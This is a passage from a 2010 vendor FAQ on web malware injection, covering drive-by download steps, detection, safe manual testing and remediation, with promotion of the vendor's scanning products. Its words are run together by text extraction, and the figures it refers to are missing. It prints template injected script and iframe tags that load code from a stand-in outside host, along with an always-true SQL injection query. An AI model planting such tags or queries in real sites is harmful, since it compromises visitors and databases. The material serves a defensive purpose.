Inparalleltostep1,thehackerplacestheexploitcodethatwillattackthebrowserontheHopPointwebsite.The injectedcodeinstep1causesthiswebpagetorenderintherequestedwebpage. Step3Malwareplacement Inparalleltostep1andstep2,thehackerplacesmalwareonaserverunderhiscontrol.Thismalwarecontains theutilitiesthatwillbesilentlydownloadedtothecomputerofeveryuserthatbrowsestheinjectedwebsitein Step1. Step4LegitimateWebapplicationaccess Internetusersbrowsetheinjectedwebsiteandrequestthepagethathasbeeninjectedwithamaliciousiframe. Step5Maliciousiframeexecution WhenInternetusersrequestthecompromisedwebpage,theiframerenderscontentfromtheHopPoint.This page contains the exploit code that directly targets the browser or takes advantage of vulnerable browser extensionssuchasaPDFreader. Step6Exploit TheexploitcodefromtheHopPointwebpageisexecutedintheWebbrowserviatheinjectediframe.Inone example,theexploitcodeutilizestheHeapSpray7attacktotakecontrolofthebrowser.Oncetheexploithas takencontrolofthebrowser,itprovidesasetofinstructionsforthebrowsertoexecute. Step7MalwareRequest Theexploitedbrowserexecutescommandsissuedtoitintheexploitcode.Thisincludesrequestingthemalware fromaserverspecifiedbythehacker. Step8Malwaredownload Thebrowsersilentlydownloadsthemalwarewhichiswrittentodiskandexecuted.

33.HowdoIknowmywebsiteisinfectingmycustomerswithmalware?
Antivirusisnotadequate
A discussion of Heap Spray attack is beyond the scope of this document. Refer to http://en.wikipedia.org/wiki/Heap_spraying for more information. 2010 Armorize Technologies Inc. All Rights Reserved 22
7

WebMalwareInjection FAQ Version1.0 February12,2010

PoorlywrittenmalwarewillsetoffantivirusalarmsonenduserPCsaccessingtheinjectedwebsite.Whilethisis embarrassinganddamagesthecorporatereputation,ultimatelyitwillnot compromisethoseclientswho have enabledandproperlyconfiguredtheirbasicdesktopsecuritymechanisms. However,thevastmajorityofmalwareiscraftedusingobfuscation,encodingandpackingtechniquesthatmake itinvisibletoeventhemostuptodateAV.Whendealingwiththistypeofmalware,signaturebaseddetectionis largelyineffective. GoogleSafeBrowsingAPIisnotadequate MalwareinjectioncausesInternetuserstodownloadandexecutemalwarewithouttheirknowledgeorconsent. Withoutactivemalwareinjectionmonitoring,businessownerswillonlybeawarethattheirwebsiteisinitiating driveby downloads when it is flagged by search engines (such as Google) as a source of malware. Once this happens,businessreputationwillbeseverelydamagedandwebsitetrafficwilldecrease,drivingdownbusiness revenueandmarketingprofile. There are technologies that consolidate malware threat feeds and signatures from Googles malware samples. However,astheyarelargelyreliantonGooglesSafeBrowsingIndex,theywillrarelyalertbusinessesintimeto preventGoogleflagging. Behavioralanalysisdetectsmalwareinjectionimmediately TheidealsolutionisanactivemalwareinjectionmonitoringservicesuchasHackAlert.Thisbehavioralanalysis solutionscansthewebsitecontinuously,generatingHTTPrequestsandanalyzingHTTPresponsesforparameters thatexhibitpotentialmaliciousbehaviorsuchasobfuscatedredirectionto3rdpartywebsitesoractivemalware downloads.FormoreinformationonHackAlertrefertoHackAlertFAQformoredetails.

34.WhenmanuallytestingforMalwareinjectionwhatprecautionsarenecessary?
ItisimportanttorememberthatsimplybrowsinganinfectedsiteisenoughtocompromiseaPC.Ifmanual verificationisrequired,anumberofsafeguardsarerecommended. Logonasanonprivilegeduser MuchofthemalwarecirculatingontheInternetrequireslocaladministratorrightstorun.Simplybrowsingthe Internetwhileloggedonasanonprivilegedregularuseraccountcanlimittheimpactofmalware.Forexample malwarerunninginthecontextofadmincandothefollowing: Installkernelmoderootkitsand/orkeyloggers(verydifficultimpossibletodetect)
2010 Armorize Technologies Inc. All Rights Reserved 23

WebMalwareInjection FAQ Version1.0 February12,2010

Installandstartservices InstallActiveXcontrols,IEandshelladdins(commonwithspywareandadware) Accessdatabelongingtootherusers Causecodetorunwheneveranybodyelselogson CapturingpasswordsenteredintotheCtrlAltDellogondialog ReplaceOSandotherprogramfileswithtrojanhorses Accesssensitiveaccountinformation,includingaccountinfofordomainaccounts Disable/uninstallantivirus Coveritstracksintheeventlog Rendermachineunbootable UseVirtualMachines InsteadofbrowsingthewebsitefromtheOS,installsoftwaresuchasVMwaretocreateahardenedOSimage accessedwithnonprivilegedaccountcredentials.Asanaddedsecuritymeasure,configurethisVMto automaticallyresetaftereachuse. Thirdpartytools Insteadofbrowsingdirectlytoawebsiteuse3rdpartytoolssuchas: cURLCommandlinetoolwritessourcecodetoscreenorfileoutput WGETCommandlinewebsitecrawlerwritestofile(http://daniel.haxx.se/docs/curlvswget.html) Securethebrowser Setbrowsersecuritytohightopreventunwantedjavascriptsfromrunning.Notethatthisisnotgoingto preventexploitsindownloadedPDFsfromrunningthough. UseFirefoxwithnoscripthttps://addons.mozilla.org/enUS/firefox/addon/722toonlyrunscriptsfrom sitesthathavebeenmanuallyaddedtoawhitelist.

35.HowdoIknowmywebsitehasbeeninjected?

Inatypicalmalwareinjectionscenario,ahackerwilltakeadvantageofavulnerablewebsitetoinjectsomeform ofmaliciouscontentthatwillexploitthewebbrowserwhenthepageisdisplayed.Ifawebpageissuspectedto havebeeninjecteditwillbenecessarytoexaminetheapplicationcodeandwebserverforevidenceof: InjectedIframes Injectedjavascript Injectedobjectssuchasflash,PDF

2010 Armorize Technologies Inc. All Rights Reserved 24

WebMalwareInjection FAQ Version1.0 February12,2010

DatabaseInjection CompromiseofotherservicessuchasFTP

36.Isthereageneralformatforinjectedcode?
IngeneralinjectedWebapplicationcode(iframesorjavascript)willtakeaformatsimilarto
<script src=http://unknown-third-party-host.com/load.js > </script> <script>[obfuscated javascript that contains eval(xyz);]</script> <iframe src=http://unknown-third-party-host.com/loader.php > </iframe>

37.HowcanItellifmywebsitehasinjectediframes?
Theremaybeaneedforiframesintheapplicationsoinmanualinspectionitisuptotheapplicationownerto distinguish the legitimate code from injected. Automated tools such as Armorize HackAlert enable this but evenwithmanualinspectiontherearesometelltalesignstolookfor.Refertothepreviouslydiscussediframe whichisshownagainbelow.

Inparticular,referenceto3rdpartywebsitesandobviouseffortstohideit(dimensionssettozero,visibilitysetto hidden) would indicate injection. This iframe would typically be disguised (or obfuscated) using one of a numberoffreelyavailableencoding8toolstoyieldthefollowing:

http://www.auditmypc.com/html-encoder.asp 2010 Armorize Technologies Inc. All Rights Reserved 25

WebMalwareInjection FAQ Version1.0 February12,2010

38.HowcanItellifmywebsitehasinjectedjavascript?
Initssimplestform,injectedjavascriptwillshowupbetween<script>tagsas:
<script src=http://unknown-third-party-host.com/load.js > </script>

Howeveritisfarmorelikelythatjavascriptwillbeencodedorsomehowobfuscatedtomakeitlessnoticeableto eitherhumanorautomateddetection:
<script>[obfuscated javascript that contains eval(xyz);]</script>

Forexample,thefollowingcodesnippetisapieceofdrivebydownloadcodethatexploitsMS06067,aknown MicrosoftInternetExplorervulnerability:

2010 Armorize Technologies Inc. All Rights Reserved 26

WebMalwareInjection FAQ Version1.0 February12,2010

Thisappearsasmalicioustoautomatedmechanismaswellashumans.However,ifwerunthiscodethroughan encodingutilitysuchasDeanEdward'sjavascriptcompressor9wegettheresultsbelow.

http://dean.edwards.name/packer/ 2010 Armorize Technologies Inc. All Rights Reserved 27

WebMalwareInjection FAQ Version1.0 February12,2010

Theeval()iswhatiscarryingthemaliciouscodeandthepayloadiswhat'scontainedinsidetheeval() function.Theeval()issuspiciousasarethevariablenamesthathavebeenrenamedandtheinclusionof "shellcode". Inreality,thehackerwouldrunhiscodethroughanumberofsimilarutilitiestoensurethatitwasundetectable bybothhumaninspectionandbysignaturebasedmalwaredetectiontools. Asarule,whenitcomestoassessingmaliciousjavascriptinjectionitisnecessaryto: Ensureallcleartextjavascriptislegitimateandistherebydesign

2010 Armorize Technologies Inc. All Rights Reserved 28

WebMalwareInjection FAQ Version1.0 February12,2010

QuestionandexamineALLscrambled,encodedorobfuscatedcodetodeterminewhyitisthereandwhyit hasbeenobfuscated.

39.Aretheothermeansofmalwareinjectionbesidesiframes?
Malwareisaneverevolvingtechnology.Changesinattackgoalsandtechnologyimprovementshaveresultedin manyiterationsandvariationsfromtypicalattackmethods.Insomecasesthemalwareinjectionmaynotrely oniframesatall: Malwareplaceddirectlyoncompromisedwebserver Earlierexamplesdiscussedthesituationwhereawebserveriscompromisedwiththeintentofforcingthe browsertodownloadmalwarefromawebsiteotherthantheonehostingthecompromisedapplication.Inthis case,someformofredirectionisrequired. However,iftheserverhostingthecompromisedWebapplicationalsohoststhebrowserexploitandtheactive malwaredownload,thentherewillbenoneedtoforthehackertoredirectthebrowserandthereforethereisno needforaniframe. Maliciouscodeinsideanembeddedobject Recenttrends10indicatethatinsteadofinjectingmaliciouscodeintotheHTMLitself,hackersareinjectingobjects suchasPDFdocumentsorFlashanimationwiththemaliciouscodeinsidethem.Theobjectsareembeddedusing the<embed>or<object>tagsandthusrequirenoiframe.Whenthebrowserrequeststhewebpagewiththe maliciousobject,thebrowserextensionforthatobject(PDFreader,flashplayer,mediaplayer)processesthe maliciouscodeandisexploited. Maliciouscodeinjectedintothedatabase Itispossibletoinjectmaliciouscoderightintothedatabasebyinsertingcommandsorqueriesinuserinputform fields.Itmaybepossibletoexploitpoorapplicationinputfilteringandthusinteractdirectlywiththedatabase. Oncethisisachieved,databasecredentialscanberetrievedordatabaseoutputcanbemodifiedsoastoredirect allbrowsersqueryingthedatabasetoawebsiteofthehackerschoosing.Again,iftheredirectionisdynamically specifiedindatabaseoutput,theremaynotbeanyevidenceinthewebpagecodeitself.

Adobe Reader Zero-Day Exploit, Dec 2009 http://www.pcworld.com/businesscenter/article/184704/adobe_reader_zeroday_exploit_protecting_your_pc.html 2010 Armorize Technologies Inc. All Rights Reserved 29

10

WebMalwareInjection FAQ Version1.0 February12,2010

40.HowcanItellifmywebsitehasinjectedobjectssuchasflashorPDFs?
ObjectssuchPDFs,Images,iframes,etc.canbeembeddedintheHTMLcodeusingthe<object>tagasfollows: <object onreadystagechange="Name"></object> Inaddition,Flashanimationwillalsorelyonthe<embed>or<object>tags. Hackerscanembedcodeinthesecomponentstocompromisethebrowserextensionsthathandlesthem.Ifthe objectsthemselvesaremalicious,examinationoftheHTMLcodewillnotrevealanythingotherthanthepresence oftheobject.Withoutattacksignaturesfromthepluginvendors,itmaybedifficulttoidentifythese componentsasmalicious.Inthiscaseitisrecommendedtoquestionalltagsrelatedtoobjectembeddingto ensurethattheyarelegitimate.

41.HowdoIknowmydatabasehasbeeninjected?
Webapplicationsrelyheavilyondatabases.Theyareoftenreferredtoasbeingdynamicduetothefactthat muchofwhatisdisplayedinthebrowserisnotaresultofthewebcodeitselfbutisinsteaddynamically generatedbythedatabaseinresponsetouserinput. Ifahackerhasmanagedtosuccessfullyinjectcommandsdirectlyintothedatabase,theymaybeabletocontrolit andthusgovernwhatisreturnedtowebbrowsers.Thismayincludeiframesorothermaliciouscontentthat seekstoexploitthebrowser. Insomecases,theremaybelittleevidenceinthesourcecode.Amoreeffectivestrategyatthisstageisto analyzetheHTTPlogswithaspecificfocusontheapplicationformfields.Inthiswayitmaybepossibleisolate SQLquerysyntaxthatpassedthroughtheformfields. QuerieswithparametersthatwillalwaysbetruearegeneralindicatorsofSQLinjectionattemptsasinthe exampleshowbelow.
SELECT * FROM Users WHERE Username='1' OR '1' = '1' AND Password='1' OR '1' = '1'

FormoreinformationongeneralSQLinjectiontestingstepsrefertoOWASPsSQLInjectingtestingguide11.

11

Testing for SQL Injection (OWASP-DV-005) http://www.owasp.org/index.php/Testing_for_SQL_Injection_%28OWASP-DV-005%29 2010 Armorize Technologies Inc. All Rights Reserved 30

WebMalwareInjection FAQ Version1.0 February12,2010

42.Whatotherservicesmightahackerexploitforinjection?
TherearenumerousinjectionpathsintothebesidestheWebapplicationandthedatabase. WebServer IftheWebserveritselfisvulnerablethehackermaybeabletogainaccesstoitinordertocontrolit.Forexample iftheserverconfigurationhasnotbeenchangedfromthedefaults,thehackermaybeabletoaccessthe administrationwebsiteviaknownpasswords.Alternatively,ifthewebsitehasnotbeenpatchedagainstattacks suchaspathtraversal,thehackermaybeabletonavigatefromthewebsitetotheserverfilesystem. OtherServices IfotherservicessuchasFTP,SMTP,etcarerunningontheserver,itmaybepossibletogainelevatedprivilege throughanassociatedvulnerabilityorcommonlyknownpassword.Forexampleitisverycommonforhackersto shareFTPpasswordsforhostingservers.Thesepasswordsaretypicallysuppliedtowebsiteownerstofacilitate contentuploadsbuttheyarerarelychangedandeventuallyleakout. OperatingSystem Iftheoperatingsystemitselfisvulnerable,ahackermaybeabletoinjectOSlevelcommandsviathewebsiteor anotherrunningservice.TherearemanyTrojanapplicationsthatarespecificallydesignedtotrawlinfected computerharddriveslookingforpasswordsthatcanbeusedtoexploitserversinthesamedomain.Forexample ifaTrojanisplacedonaworkstationinthecompany.comdomain,itwillreportbackallpasswordsstoredonthat computer.OncethewriteroftheTrojangetsthese,hewillattempttousethemtobreakintopublicfacing servers.Iftheinfectedcomputerbelongedtoanadministrator,itishighlylikelythattherewillbesomevaluable passwordsstored.

43.Ifmywebsiteisinjected,ismywebserverorOperatingSystemalsocompromised?
Malwareinjectiontakesadvantageofvulnerablewebapplicationstoinjectcodethatexploitsandcontrolsweb browsersaccessingtheapplication.Inatypicalscenarioboththebrowserexploitandthemalwareitselfresides onserversotherthantheonehostingthewebsite.ThisisillustratedinFigure8. Therefore,maliciouscodeinjectedintoasinglewebsitedoesnotnecessarilyindicateacompromiseoftheweb serveritself.Itisimportanttonotehowever,thatifthewebsiteisvulnerabletoinjectionitmaybepossiblefora hackertoleveragethistoinjectdatabaseoroperatingsystemcommandswhichmayresultintotalserver compromise.

2010 Armorize Technologies Inc. All Rights Reserved 31

WebMalwareInjection FAQ Version1.0 February12,2010

Thisleadstotheothermalwareinjectionscenariowherethebrowserexploitandmalwareresideontheserver hostingthewebsite.Inthiscase,thehackerdoesnotuseanyiframesorjavascriptbutinsteadensuresthat browsersaccessingthewebsitearecompromiseddirectly. Thisisalesscommonscenarioaswebsiteshostingandservingupactuallivemalwarearemucheasiertofind thansimpleiframes.

44.Ifawebserverhostsmultiplewebsites,aretheyallaffectedbyasingleinjection?
Malwareinjectiontakesadvantageofvulnerablewebapplicationstoinjectcodeexploitsandcontrolsweb browsersaccessingtheapplication.Inatypicalscenario,boththebrowserexploitandthemalwareitselfreside onserversotherthantheonehostingthewebsite.ThisisillustratedinFigure8. Therefore,maliciouscodeinjectedintoasinglewebsitedoesnotnecessarilyindicateacompromiseofallthe websiteshostedontheserver.Itisimportanttonotehowever,thatifthewebsiteisvulnerabletoinjectionandif theattackergainedentryviatheOSorotherservicesthatarevulnerableitishighlylikelythattheycan compromisetheotherwebsitesontheserveraswell.

45.IfmywebsiteisdownloadingmalwaretousershowdoImitigate?

It is critical to stop the driveby download as soon as possible in order to protect clients and to ensure that websiteisnotflaggedasmaliciousbysearchenginessuchasGoogle12.Howevermitigationonlyaddressesthe immediateproblem.Itdoesnotdealwiththerootcause. CodeIdentification Inordertoremovetheinjectedcode,itwillbenecessarytoexaminethewebpageforsyntaxsuchas:
<script src=http://unknown-third-party-host.com/load.js > </script> <script>[obfuscated javascript that contains eval(xyz);]</script> <iframe src=http://unknown-third-party-host.com/loader.php > </iframe>

Itisalsonecessarytoreviewalljavascriptstatementstodetermine: Whethertheylegitimateorhavetheybeeninjectedbyahacker
12

Note that immediate mitigation steps may have the effect of destroying evidence which could be of use in subsequent investigation.

2010 Armorize Technologies Inc. All Rights Reserved 32

WebMalwareInjection FAQ Version1.0 February12,2010

Whytheyarescrambled,encodedorobfuscated Whatthesyntaxisoncetheyaredecoded Whethertheactualdecodedjavascriptcallsupaniframeorredirectto3rdpartywebsite

Ifthejavascriptcodeisnotalegitimatepartoftheapplicationthenitmustberemoved Itisalsonecessarytoexamineembeddedobjects(usingthe<embed> and <object> tags)suchasFlash, PDF and images. It is possible for hackers to embed code in these components to compromise the browser extension that handles them. In general, it is recommended to review all objects to be sure they serve a legitimatefunction. Removeinjectedcode Removinginjectedcodefromthecompromisedwebpagewillprovideinstantmitigationbutwillnotresolvethe underlyingissue.Thisisbecausethevulnerabilitythatallowedinjectioninthefirstplacemostlikelyresulting fromfailuretofilterapplicationinputoroutputwillcontinuetoexist.Thismeansthatthehackerisfreetocome backtocarryoutinjectionagain.Formoreinformationonrootcauseremediationseequestion46. Restorefrombackup Iftheinjectedcodecannotbeidentifiedandthereisaknowngoodbackupofthewebapplicationsourcecode, thentheapplicationcanbereinstalled.However,iftherestoredapplicationhasthesamevulnerabilities,itisonly amatteroftimebeforetheinjectionhappensagain. Removalthroughegressfiltering ItisalsopossibletoenableautomatedremovalofmaliciouselementsfromoutboundHTTPresponses.Thiswill requireintegrationbetweenthemalwaredetectionprocessandperimeteregresscontrolsworkingatapplication layer. Iftheactualexploitcodebeingdownloadedtowebbrowserscanbeidentified,itmaybepossibletoutilizethe outboundHTTP(response)analysiscapabilitiesofthewebserverortheWebApplicationFirewall(WAF)tofilter outtrafficwiththosepatterns. Forexample,ArmorizeHackAlertsupportsawebserverpluginthatreceives HackAlertnotificationsandautomaticallyfiltersmaliciouselementsoutofHTTPresponsesinrealtime.

46.IfmywebsiteisdownloadingmalwaretousershowdoIremediate?

2010 Armorize Technologies Inc. All Rights Reserved 33

WebMalwareInjection FAQ Version1.0 February12,2010

ShiftingsecurityfocustoWebapplicationsdoesnotmeanthattriedandtrustedsecuritymechanismsshouldbe cast aside. Practices such as OS and Web server patching as well as network access controls and Firewalls continuetobecriticalsecuritysteps. Howeverwiththefundamentalopenchannel(referenceFigure5)thatexistsbetweenthepublicfacingwebsite andtheInternet,additionalprotectionhigherintheprotocolstackisrequired.Inordertosecurethewebsiteitis necessaryto: SecuretheWebapplicationitself Secure coding and development practices will ensure that Web application security is implemented from the outset.Typicallyagreatdealcanbeachievedbyensuringappropriateinputandoutputfiltering.Thiswillensure thatnounexpectedormaliciousparametersarepassedtotheWebapplicationorbacktotheusers.However, whilefairlysimpletoimplementduringdevelopment,inalargecodebase,locationofallpotentialentrypoints requiringsuchfilteringisbestachievedbyanautomatedsourcecodeanalysisorasoftwareverificationtoolsuch asArmorizeCodeSecure. Blackboxtesting Alsoknownaspenetrationtestingorvulnerabilityassessmentthistestingtechniqueisusedtoemulatehacker activityontherunningapplication.Implementedthroughspecializedscanningsoftwareorasmanualtesting,the goalistolocateapplicationentrypointsvulnerabletothesortofattacksthatwouldallowinjection. BlockattacksininboundHTTPrequests Web Application Firewalls (WAF) such as Armorize SmartWAF will inspect inbound HTTP traffic analysis to ensurethattherearenoattacksembeddedinHTTPrequests.Notethatwiththedynamicandevolvingnatureof attackssimplyblacklistingpotentialattackpatternsmaynotbeveryeffective. MonitorandfilteroutboundHTTPresponses Ifawebsiteisinjected,themostobviousindicatorismalwaredrivebydownloadspresentintheHTTPresponse traffic.ArmorizeHackAlertmonitorsoutboundHTTPtraffictoensurethattherearenomaliciouselementsthat would signify driveby downloading. Additionally, HackAlert will work with its web server module to ensure thatmaliciouselementsareautomaticallyremovedfromHTTPresponsesinrealtime.

2010 Armorize Technologies Inc. All Rights Reserved 34